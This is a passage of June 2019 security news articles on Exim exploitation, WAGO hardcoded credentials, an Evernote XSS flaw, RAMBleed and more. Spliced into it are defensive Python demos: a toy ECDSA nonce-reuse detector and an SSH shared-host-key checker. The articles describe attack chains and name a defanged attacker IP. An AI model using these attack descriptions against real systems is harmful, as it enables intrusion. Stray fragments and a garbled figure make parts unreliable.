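# Toy curve y^2 = x^3 + 2x + 2 over F_17 with generator G of prime order 19
# (a textbook curve, far too small for real use, chosen so every value can be
# checked by hand). Constructed for illustration.
P, A = 17, 2
G = (5, 1)
N = 19

def inv_mod(x, m):
    return pow(x % m, -1, m)

def point_add(p1, p2):
    """Affine point addition; None represents the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * inv_mod(2 * y1, P) % P
    else:
        lam = (y2 - y1) * inv_mod(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)

def scalar_mult(k, point):
    """Double-and-add scalar multiplication."""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result

def sign(priv, h, k):
    """ECDSA signature of message hash h with per-signature nonce k.
    The security of this step rests entirely on k being unpredictable."""
    point = scalar_mult(k % N, G)
    if point is None:
        raise ValueError("unusable nonce, sign again")
    r = point[0] % N
    s = inv_mod(k, N) * (h + r * priv) % N
    if r == 0 or s == 0:
        raise ValueError("unusable nonce, sign again")
    return (r, s)

def verify(pub, h, sig):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = inv_mod(s, N)
    point = point_add(scalar_mult(h * w % N, G), scalar_mult(r * w % N, pub))
    return point is not None and point[0] % N == r

class NonceBuffer:
    """Model of the advisory's failure mode: the first value handed out after
    power-up is leftover self-test content (the same every time); later values
    are fresh. Values are constructed, not taken from any device."""
    def __init__(self, leftover, fresh):
        self._values = iter([leftover] + list(fresh))

    def next_nonce(self):
        return next(self._values)

def sign_across_power_cycles(priv, batches, leftover):
    """Sign each batch after a fresh power-up; batches[i] = (hashes, fresh nonces)."""
    sigs = []
    for hashes, fresh in batches:
        buf = NonceBuffer(leftover, fresh)
        sigs += [sign(priv, h, buf.next_nonce()) for h in hashes]
    return sigs

def find_repeated_r(signatures):
    """Auditor-side check: signatures over different messages that share an r
    value were made with the same nonce, even though each verifies fine.
    Returns {r: [indexes of the signatures sharing it]}."""
    seen = {}
    for i, (r, _) in enumerate(signatures):
        seen.setdefault(r, []).append(i)
    return {r: idx for r, idx in seen.items() if len(idx) > 1}

PRIV = 6                                    # constructed private key
PUB = scalar_mult(PRIV, G)                  # (16, 13)
BATCHES = [([9, 2], [11]), ([4, 8], [13])]  # (message hashes, fresh nonces) per power cycle

if __name__ == "__main__":
    sigs = sign_across_power_cycles(PRIV, BATCHES, leftover=5)
    print("all signatures verify:", all(verify(PUB, h, s) for h, s in zip([9, 2, 4, 8], sigs)))
    print("repeated r values:", find_repeated_r(sigs))   # {9: [0, 2]}
```

The two first-after-power-up signatures verify like any other, so only a check across signatures reveals the shared nonce.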

Yubico discovered the flaw in March and addressed it with the release of the firmware version 4.4.5 that was certified at the end of April.

At the time of writing, there is no news of attacks exploiting the issue in the wild.

Yubico is contacting its customers to inform them of the free device replacement. The company said that most of the affected security keys have already been replaced or are in the process of being replaced.

People who bought their devices from a reseller should contact the reseller and ask for the devices to be replaced.

Pierluigi Paganini

(SecurityAffairs – Yubico, hacking)


Millions of Exim mail servers are currently under attack

Hackers are targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions, threat actors leverage the CVE-2019-10149 flaw.

Millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions are under attack; threat actors are exploiting the CVE-2019-10149 flaw to take them over.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

The flaw is easily exploitable by both local and remote attackers in certain non-default configurations; experts believe that threat actors will start using it in attacks in the wild.

The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February. Unfortunately, a large number of installations are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim, it is possible to find 3,655,524 installs, most of them in the United States (1,984,5538).
Searching for patched Exim installs running the 4.92 release, we find 1,795,332 systems.


“CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers; once a server is compromised, the initially deployed script downloads a second script that checks whether OpenSSH is installed on the machine.

If OpenSSH is not present, the script installs and starts it, then enables root logins via SSH using an RSA public/private key pair for authentication.

Experts also observed another campaign carried out by a second group of attackers that is also targeting Exim servers.

The second stream of attacks was spotted by Freddie Leeman on June 9; in this wave, attackers were delivering the script used to exploit vulnerable Exim servers from 173[.]212[.]214[.]137/s.

“During the subsequent days, this group evolved its attacks, changing the type of malware and scripts it would download on infected hosts; a sign that they were still experimenting with their own attack chain and hadn’t settled on a particular exploit method and final goal.” reported ZDnet.

The attackers behind this second stream used multiple variants and continuously changed the scripts.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)


WAGO Industrial Switches affected by multiple flaws

A security expert at SEC Consult discovered that some WAGO industrial managed switches are affected by several serious vulnerabilities.

A security researcher at consulting company SEC Consult discovered several vulnerabilities in some models of WAGO industrial switches.

The vulnerabilities affect WAGO industrial switches 852-303, 852-1305 and 852-1505 models. The company has already fixed the issues with the release of firmware versions 1.2.2.S0, 1.1.6.S0 and 1.1.5.S0, respectively.

“The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector.” reads the security advisory. “Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device.”

One of the most severe issues is the presence of hardcoded credentials that can be used to connect to the devices via Telnet and SSH.

“Hardcoded Credentials (CVE-2019-12550) – The device contains hardcoded users and passwords which can be used to login via SSH and Telnet.” continues the advisory.

The expert also found hardcoded private keys for the SSH daemon in the device’s firmware. An attacker can use them to carry out man-in-the-middle (MitM) attacks against the Dropbear SSH daemon without the victim noticing any fingerprint changes.

“The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches to the embedded private key.” states the advisory.
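An added example (not SEC Consult’s or WAGO’s tooling) of the fleet-level check a defender can run for this class of issue: compute the OpenSSH-style SHA256 fingerprint of every device’s SSH host key and group the devices that present the same one, since a key shared across units is one that ships in the firmware rather than being generated per device. Host names and key material are constructed; the wire-format builder exists only to fabricate realistic public key lines offline.

```python
import base64
import hashlib
import struct
from collections import defaultdict

def _ssh_string(data):
    """Length-prefixed string as used in the SSH wire format (RFC 4251)."""
    return struct.pack(">I", len(data)) + data

def constructed_ed25519_pubkey_line(key_bytes, comment):
    """Build a known_hosts/authorized_keys style line for a constructed key.
    These are NOT real keys: the 32 bytes are arbitrary test data."""
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(key_bytes)
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " " + comment

def openssh_fingerprint(pubkey_line):
    """SHA256 fingerprint in the form printed by 'ssh-keygen -lf' (no base64 padding)."""
    key_type, b64 = pubkey_line.split()[:2]
    blob = base64.b64decode(b64)
    # The first wire string inside the blob must repeat the declared key type.
    (name_len,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + name_len] != key_type.encode():
        raise ValueError("key type does not match blob")
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def find_shared_host_keys(inventory):
    """inventory: {hostname: host public key line}. Returns {fingerprint: [hosts]}
    for every fingerprint that more than one device presents."""
    by_fp = defaultdict(list)
    for host, line in inventory.items():
        by_fp[openssh_fingerprint(line)].append(host)
    return {fp: sorted(hosts) for fp, hosts in by_fp.items() if len(hosts) > 1}

# Constructed inventory: two switches presenting the same firmware-embedded key,
# one switch with a key generated on first boot.
EMBEDDED_KEY = bytes(range(32))
UNIQUE_KEY = bytes(range(32, 64))
INVENTORY = {
    "switch-a.example": constructed_ed25519_pubkey_line(EMBEDDED_KEY, "firmware"),
    "switch-b.example": constructed_ed25519_pubkey_line(EMBEDDED_KEY, "firmware"),
    "switch-c.example": constructed_ed25519_pubkey_line(UNIQUE_KEY, "generated"),
}

if __name__ == "__main__":
    for fp, hosts in find_shared_host_keys(INVENTORY).items():
        print(f"{fp} is shared by {', '.join(hosts)}: a known_hosts pin cannot tell them apart")
```

In a real fleet the key lines would come from ssh-keyscan output or from the devices’ known_hosts entries; any group the check reports is a set of devices whose SSH identity an attacker holding the firmware’s private key could assume without a fingerprint warning.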

SEC Consult also discovered that the WAGO industrial switches use outdated versions of the BusyBox UNIX toolkit and the GNU C Library (glibc). Both components are affected by known vulnerabilities, some of which are rated as critical.

Experts suggest restricting network access to the device and SSH server in order to protect the system. The good news is that affected switches are not exposed online.

The German VDE CERT has published an advisory to warn of the flaws in the WAGO devices.

Pierluigi Paganini

(SecurityAffairs – Wago industrial switches, hacking)


Ransomware paralyzed production for at least a week at ASCO factories

Malware infections can be devastating for production environments: a ransomware infection halted production operations for days at airplane parts manufacturer ASCO.

ASCO is one of the world’s largest manufacturers of aerospace components.

The company has offices and production plants in Belgium, Canada, Germany, the US, Brazil, and France. ASCO provides components to Airbus, Boeing, Bombardier Aerospace, and Lockheed Martin.

A ransomware attack has paralyzed the production in ASCO plants across several countries worldwide. The attack reportedly started on Friday and at the time of writing the current extent of the internal damage is still unknown.

After the incident, nearly 1,000 employees out of 1,400 were sent home for the entire week, on paid leave.


As a result of having IT systems crippled by the ransomware infection, the company has sent home approximately 1,000 of its 1,400 workers.

“Employees of the Asco company in Zaventem are technically unemployed for a few days because the company’s servers have been hacked. The company confirms that it has been hit by a cyber attack since Friday. A complaint has been submitted to the police.” states VRT (Flemish Radio and Television Broadcasting Organisation). “The public prosecutor says there are traces of “ransomware” found on the computers, with hackers asking ransom to re-release the blocked computers.”

The company reported the incident to the local authorities and hired third-party experts to investigate the attack.

“We have informed all competent authorities in this area of ​​this cyber attack and have brought in external experts to solve the problem,” says HR director Vicky Welvaert. “We are currently working on it with all our might.” Welvaert does not want to comment on whether the problem is now under control or from when the business activities will be restarted.

According to the media, the ransomware first hit the Zaventem plant in Belgium, but immediately afterwards ASCO also shut down, as a precaution, its production plants in Germany, Canada, and the US.

At the time of writing, it is not clear whether the company decided to pay the ransom to rapidly restore its systems or simply restored from its backups.

Although ASCO would be a prime target for cyber spies, its representatives told The Brussels Times that there is currently no evidence of theft of information.

“The company also notified the authorities, and told the paper there is currently no evidence of the theft of information, but that it is taking the situation very seriously.” reported The Brussels Times.

“Although ransomware attacks are usually only about money, a company like Asco, which has connections in the defence sector, could also be a target.”

Pierluigi Paganini

(SecurityAffairs – ASCO, ransomware)


Massive DDoS attack hit Telegram, company says most of junk traffic is from China

Encrypted messaging service Telegram was hit by a major DDoS attack apparently originating from China, likely linked to the ongoing political unrest in Hong Kong.

Telegram was used by protesters in Hong Kong to evade surveillance and coordinate their demonstrations against a proposed law that would allow extraditions from the territory to mainland China.

Hong Kong is facing its worst political crisis since its 1997 handover from Britain to China; protesters are involved in violent demonstrations, repressed by the police with tear gas and rubber bullets.

At the same time, Telegram suffered a massive Distributed Denial of Service (DDoS) attack; users mainly in South and North America were affected by a significant outage, although problems were also observed by users worldwide.

Hackers used a huge botnet to generate the traffic that made Telegram servers inaccessible.

However, users in other locations were also affected, as some people in Australia reported problems with loading video content.


According to Pavel Durov, Telegram’s CEO, most of the junk traffic originated from China.

Telegram kept its users updated via Twitter; at the time of writing it has restored normal operation.

Telegram is one of the most popular encrypted instant messaging apps that currently has over 200 million monthly active users.

Telegram is currently blocked in China by the country’s Great Firewall. Many people fear that the government in Beijing will increase its influence on Hong Kong.

“The city’s special status under its handover agreement allows freedoms unseen in mainland China, but many fear they are under threat as Beijing exerts increasing influence on Hong Kong.” states the AFP.

“The current protests were sparked by fears that the proposed law would allow extraditions to China and leave people exposed to the mainland’s politicised and opaque justice system.”

Pierluigi Paganini

(SecurityAffairs – Hong Kong, DDoS)


Flaw in Evernote Web Clipper for Chrome extension allows stealing data

Security experts discovered a vulnerability in the popular Evernote Web Clipper for Chrome that can be exploited to steal sensitive data from sites visited by users.

Security experts at browser security firm Guardio discovered a critical universal cross-site scripting (XSS) vulnerability in the Evernote Web Clipper for Chrome.

“In May 2019 Guardio’s research team has discovered a critical vulnerability in Evernote Web Clipper for Chrome.” reads a blog post published by Guardio. “A logical coding error made it possible to break domain-isolation mechanisms and execute code on behalf of the user – granting access to sensitive user information not limited to Evernote’s domain.”

The vulnerability, tracked as CVE-2019-12592, could be exploited by attackers operating malicious websites to bypass the browser’s same-origin policy (SOP) and execute arbitrary code on the victim’s behalf.

The Evernote Web Clipper extension for Chrome allows users to easily save online content to Evernote, including web pages, articles, images, text, and emails. The popular extension has over 4.6 million users.

The attack scenario sees hackers tricking victims into visiting specially crafted websites that load hidden iframes.

The vulnerability discovered by the experts in the Evernote extension allows an attacker to inject a malicious payload into all iframe contexts and steal credentials, cookies, and other data.

Researchers published a video PoC of the attacks that shows how hackers can steal a user’s Facebook information and data on PayPal transactions.

The researchers also described a Proof-of-Concept (PoC) attack to steal sensitive data from an unsuspecting user; the attack scenario is as follows:

  1. User navigates to the attacker’s malicious website (e.g. via social media, email, a compromised blog comment, etc.).
  2. Malicious website silently loads hidden, legitimate iframe tags of targeted websites.
  3. The exploit is triggered by the malicious website and causes Evernote’s internal infrastructure to inject an attacker controlled payload into all iframes contexts.
  4. Injected payload is customized for each targeted website, able to steal cookies, credentials, private information, perform actions as the user and more.

Below the timeline of the flaw:

  • May 27th, 2019 – Initial disclosure.
  • May 28th, 2019 – Follow-up email.
  • May 28th, 2019 – Issue confirmed and classified as a vulnerability.
  • May 29th, 2019 – Credited on Evernote’s Security Page.
  • May 31st, 2019 – Evernote Web Clipper 7.11.1 released.
  • June 4th, 2019 – Fix confirmed.

Pierluigi Paganini

(SecurityAffairs – Evernote Web Clipper for Chrome, hacking)


Google expert disclosed details of an unpatched flaw in SymCrypt library

Tavis Ormandy, a white hat hacker at Google Project Zero, announced that he has found a zero-day flaw in SymCrypt, the cryptographic library of Microsoft’s operating system.

The recently released Microsoft Patch Tuesday security updates for June 2019 failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs to trigger a denial of service condition by interrupting the encryption service for other programs.

The vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. In accordance with Google’s 90-day disclosure policy, Ormandy publicly released details and a proof-of-concept for the vulnerability.

Ormandy privately reported the flaw to Microsoft in March 2019, but the tech giant failed to fix it within 90 days.

The unpatched vulnerability affects Windows 8 servers and above.

According to Microsoft, SymCrypt is the primary library for implementing symmetric cryptographic algorithms in Windows 8, it also implements asymmetric cryptographic algorithms starting with Windows 10 version 1703.

Ormandy discovered that it is possible to trigger the flaw to cause an infinite loop when performing specific cryptographic operations.

“There’s a bug in the SymCrypt multi-precision arithmetic routines that can cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric.” wrote the expert.

“I’ve been able to construct an X.509 certificate that triggers the bug. I’ve found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g. ipsec, iis, exchange, etc) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock.”

The white hat hacker used a specially crafted X.509 digital certificate to trigger the flaw, he explained that any application running on the system that processes the certificate can trigger the vulnerability.

Specially crafted certificates could be provided in multiple ways, for example in digitally signed and encrypted messages via the S/MIME protocol.

Ormandy explained that in some cases it would be necessary to reboot the vulnerable machine to return it to a normal state.

The Microsoft Security Response Center (MSRC) told the Google expert that the company will not be able to provide a security patch before next month.

Pierluigi Paganini

(SecurityAffairs – SymCrypt, hacking)


FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor

After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.

Two years after the last report, the FIN8 group is back and has carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.

The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.

FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.

The ShellTea backdoor was analyzed by researchers at root9B in June 2017; the malware was used by threat actors to deliver the PoS malware.

Now experts at Morphisec revealed to have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.

“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”

Experts believe the attackers launched phishing attacks in an attempt to deliver PoS malware.

Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even though the two groups are considered separate.

“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”

The attack chain starts with a fileless dropper using PowerShell code executed from registry keys and leading to ShellTea.

ShellTea attempts to evade detection by checking for the presence of virtualized environments and standard analysis tools. The malicious code uses a hashing algorithm for most of its functions; the algorithm is similar to the one implemented in the previous ShellTea version.

ShellTea is then injected into Explorer; it communicates with the C2 over HTTPS and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command using the downloaded native Empire ReflectivePicker, and of course downloading and executing a POS malware.

Attackers use the PowerShell script to collect information on the user and the network, then send the gzipped data to the C2 and delete it.

Experts pointed out that attackers are constantly innovating their arsenal, their new techniques are able to easily evade standard POS defenses.

“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8, we’ve seen multiple attacks by FIN6, FIN7 and others.” concludes Morphisec.

“Many POS networks are running on the POS version of Windows 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.” “As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses.”

Pierluigi Paganini

(SecurityAffairs – FIN8, hacking)


Radiohead releases a trove of stolen music in response to the hack

The English rock band Radiohead released an 18-hour trove of private recordings from their 1997 album “OK Computer” in response to the recent hack.

The alternative rock band Radiohead released an 18-hour trove of private recordings from their 1997 album “OK Computer” after being hacked by crooks that demanded a ransom of $150,000 for the music.

Radiohead uploaded 1.8 gigabytes of recordings, live performances, and some unpublished songs on their website (radiohead.bandcamp.com).


The hackers’ dream of making money from the stolen music vanished; now anyone can access it for free.

The group is also offering for sale downloads of an album of the 18 hacked MiniDiscs for £18 and donating the proceeds to the Extinction Rebellion environmental campaign group. That’s amazing guys!

“We’ve been hacked,” explained frontman Thom Yorke.

“It’s not v interesting,” he added. “As it’s out there it may as well be out there, until we all get bored and move on.”

Below is the tweet published by the group’s guitarist, Jonny Greenwood, confirming the hack that occurred last week.

“Someone stole Thom’s minidisk archive from around the time of OK Computer, and reportedly demanded $150,000 on threat of releasing it,” Greenwood wrote.

“So instead of complaining — much — or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion.”

Immediately after the hack, the Reddit user ‘u/santicol’ revealed that someone claiming to have the stolen music had approached a “well known leaker” and offered them previews of the tracks.

“The user described how someone claiming to have the archive came in contact with a “well-known leaker” and offered them previews of the tracks.” reported the AFP press.

“They were asking upwards of $150,000 for the entire set, at $800 per studio track and $50 per live track,” added the Reddit user.

“The leaker seems to be well known in some spaces and has a history of trading in very rare/high profile material.”

Pierluigi Paganini

(SecurityAffairs – Radiohead, hacking)


RAMBleed, a new Side-Channel Attack that allows stealing sensitive data

Security researchers disclosed the details of RAMBleed, a new type of side-channel attack on DRAM that allows stealing sensitive data from memory.

A team of academics from several universities has disclosed the details of a new type of side-channel attack on dynamic random-access memory (DRAM), dubbed RAMBleed. The RAMBleed issue, tracked as CVE-2019-0174, could be used by attackers to potentially obtain sensitive data from the system’s memory.

“RAMBleed is based on a previous side channel called Rowhammer, which enables an attacker to flip bits in the memory space of other processes. We show in our paper that an attacker, by observing Rowhammer-induced bit flips in her own memory, can deduce the values in nearby DRAM rows. Thus, RAMBleed shifts Rowhammer from being a threat not only to integrity, but confidentiality as well.” wrote the experts.


RAMBleed is based on the Rowhammer attack technique devised by researchers at the Google Project Zero team back in 2015.

To better understand the Rowhammer flaw, let’s remember that a DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications. To avoid that an application accesses the memory space reserved by another application, it implements a “sandbox” protection mechanism.

The bit flipping caused by the Rowhammer problem could be exploited to escape the sandbox.

The researchers at Google Project Zero started from a previous study conducted by Yoongu Kim titled “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors”. 

In modern chips, DRAM has a high density and it is hard to prevent DRAM cells from interacting electrically with each other.

The Project Zero elite hacking team demonstrated two proof-of-concept exploits that allowed them to control several x86 computers running Linux; according to the experts, the attacks could work on other operating systems as well.

Now researchers from the University of Michigan, Graz University of Technology and University of Adelaide demonstrated that an attacker with limited privileges can use a Rowhammer attack to deduce bits in nearby rows. This means that an attacker could obtain data associated with other processes and the kernel.

Previous Rowhammer attack techniques were based on write side-channels: attackers leveraged persistent bit flips, which can be mitigated by error-correcting code (ECC) memory. RAMBleed is different because it relies on a read side-channel and does not require persistent bit flips.

“It is widely assumed however, that bit flips within the adversary’s own private memory have no security implications, as the attacker can already modify its private memory via regular write operations. We demonstrate that this assumption is incorrect, by employing Rowhammer as a read side channel.” reads the research paper. “More specifically, we show how an unprivileged attacker can exploit the data dependence between Rowhammer induced bit flips and the bits in nearby rows to deduce these bits, including values belonging to other processes and the kernel.”

The researchers developed new memory massaging techniques to carefully place the victim’s secret data in the rows above and below the attacker’s memory row. In this way they caused the bit flips in the attacker’s rows to depend on the values of the victim’s secret data.

“The attacker can then use Rowhammer to induce bit flips in her own memory, thereby leaking the victim’s secret data,” added the researchers.

The experts demonstrated the RAMBleed attack by targeting OpenSSH and leaking a 2048-bit RSA key; of course this is just one possible target, and the technique could be used to steal other potentially sensitive data.

RAMBleed works against devices using DDR3 and DDR4 memory modules, and it potentially affects many other computers.

Experts suggest upgrading memory modules to DDR4 with targeted row refresh (TRR) enabled, because it makes the flaw harder to exploit.

At the time of writing, there is no evidence that RAMBleed has been exploited in attacks in the wild.

Pierluigi Paganini

(SecurityAffairs – RAMBleed, hacking)

The post RAMBleed, a new Side-Channel Attack that allows stealing sensitive data appeared first on Security Affairs.

Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws

Microsoft releases Patch Tuesday security updates for June 2019 that address 88 vulnerabilities in Windows OS and other products.

Microsoft Patch Tuesday security updates for June 2019 address 88 vulnerabilities in Windows OS and other products of the tech giant (Internet Explorer, Microsoft Edge browser, Microsoft Office and Services, ChakraCore, Skype for Business, Microsoft Lync, Microsoft Exchange Server, and Azure).

21 of the 88 flaws are rated Critical in severity, 66 Important, and only one Moderate.

Microsoft addressed four publicly disclosed privilege escalation issues rated Important. None of these vulnerabilities was exploited in attacks in the wild.

The flaws were disclosed by the researcher SandboxEscaper over the past weeks; below is the list of the issues:

One of the critical vulnerabilities fixed by Microsoft is a Windows Hyper-V Remote Code Execution issue tracked as CVE-2019-0620.

“A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.” reads the security advisory.

“An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.”

Microsoft fixes a total of three critical remote code execution vulnerabilities in Windows Hyper-V (CVE-2019-0620, CVE-2019-0709, CVE-2019-0722), the Microsoft virtualization software that allows running multiple operating systems as virtual machines on Windows.

The remote code execution flaws in Hyper-V allow an attacker to execute arbitrary code on the host operating system simply by running a specially crafted application on a guest operating system.

Patch Tuesday security updates for June 2019 also addressed two important severity vulnerabilities, tracked as CVE-2019-1040 and CVE-2019-1019, that affect Microsoft’s NTLM authentication protocol. The flaws could be exploited by remote attackers to bypass NTLM protection mechanisms and re-enable NTLM Relay attacks.

The full list of vulnerabilities addressed by Microsoft is available here.

Experts pointed out that Microsoft failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs to trigger a denial of service condition by interrupting the encryption service for other programs.

This vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. In line with Google's 90-day disclosure policy, Ormandy publicly released details and a proof-of-concept for the vulnerability today.

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, hacking)

The post Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws appeared first on Security Affairs.

Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash

Adobe Patch Tuesday updates for June 2019 address several critical arbitrary code execution flaws in Flash Player, ColdFusion and Campaign products.

Adobe Patch Tuesday security updates for June 2019 address some critical arbitrary code execution vulnerabilities in Flash Player, ColdFusion and Campaign products.

Adobe fixed critical command injection, file extension blacklist bypass and deserialization vulnerabilities in ColdFusion. The vulnerabilities could lead to arbitrary code execution on vulnerable systems. Below is the list of flaws in ColdFusion fixed by Adobe:

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
File extension blacklist bypass | Arbitrary code execution | Critical (see note below) | CVE-2019-7838
Command Injection | Arbitrary code execution | Critical (see note below) | CVE-2019-7839
Deserialization of untrusted data | Arbitrary code execution | Critical (see note below) | CVE-2019-7840

The issues affect ColdFusion 2016, 2018 and 11.

Adobe credited Badcode of Knownsec 404 Team, Moritz Bechler of SySS GmbH, and Brenden Meeder of Booz Allen Hamilton for reporting the flaws.

Adobe also informed users that remote access to the Adobe LiveCycle Data Management feature has been disabled by default due to security risks.

Adobe Patch Tuesday security updates for June 2019 also address a critical use-after-free vulnerability in Flash Player (CVE-2019-7845) that could lead to arbitrary code execution. The flaw was anonymously reported via Trend Micro’s Zero Day Initiative.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address a critical vulnerability in Adobe Flash Player.” reads the security advisory. “Successful exploitation could lead to arbitrary code execution in the context of the current user.”

Finally, Adobe addressed seven types of vulnerabilities in its Campaign product, including information disclosure, arbitrary file read, and code execution issues. The most severe vulnerability, tracked as CVE-2019-7850, is a critical command injection issue that could lead to arbitrary code execution.

Pierluigi Paganini

(SecurityAffairs – Adobe Patch Tuesday, hacking)

The post Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash appeared first on Security Affairs.

Customs and Border Protection (CBP) confirms hack of a subcontractor

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen by hackers.

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen as a result of a cyber attack.

The Customs and Border Protection agency did not reveal the name of the company involved in the incident. According to media outlets, hackers broke into the computer network of an unnamed subcontractor; many experts believe the incident could be linked to the hack of Perceptics.

At the end of May, Perceptics, a leader in license plate readers (LPRs), license plate recognition systems and vehicle identification products, announced that it had suffered a security breach. The attackers stole data and offered business plans, financial documents, and personal information for free on the dark web.


LPRs manufactured by Perceptics are installed at all land border crossing lanes for privately owned vehicle traffic (POV) in the United States, Canada, and for the most critical lanes in Mexico.

A hacker that goes online with the moniker ‘Boris Bullet-Dodger’ reported the hack to The Register and shared with the journalists a list of files as proof of the attack.

A Customs spokesman revealed that fewer than 100,000 people have been impacted: hackers accessed photos of travelers in vehicles entering and exiting the United States at a single land-border port of entry over one and a half months.

CBP said that stolen data are not available online or in the Dark Web.

“Initial information indicates that the subcontractor violated mandatory security and privacy protocols outlined in their contract,” reads a statement published by the CBP.

In any case, the subcontractor was not authorized to transfer copies of the images to its own infrastructure without CBP’s authorization.

Customs and Border Protection learned of the security breach on May 31, 2019, and pointed out that the hackers did not compromise its own network.

“The chairman of the House Homeland Security Committee, Rep. Bennie Thompson of Mississippi, noted with alarm that this is the “second major privacy breach at DHS this year.”” reported the AP.

“We must ensure we are not expanding the use of biometrics at the expense of the privacy of the American public,” he said in a statement.

Pierluigi Paganini

(SecurityAffairs – CBP, hacking)

The post Customs and Border Protection (CBP) confirms hack of a subcontractor appeared first on Security Affairs.

Security Affairs 2019-06-11 00:49:57

The MuddyWater cyber espionage group has used an updated multi-stage PowerShell backdoor in recent cyber attacks.

Security experts at Trend Micro report that the MuddyWater APT group (aka SeedWorm and TEMP.Zagros), has used an updated multi-stage PowerShell backdoor in recent cyber espionage campaigns.

The first MuddyWater campaign was observed in late 2017, when it targeted entities in the Middle East.

The experts named the campaign ‘MuddyWater’ because of the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

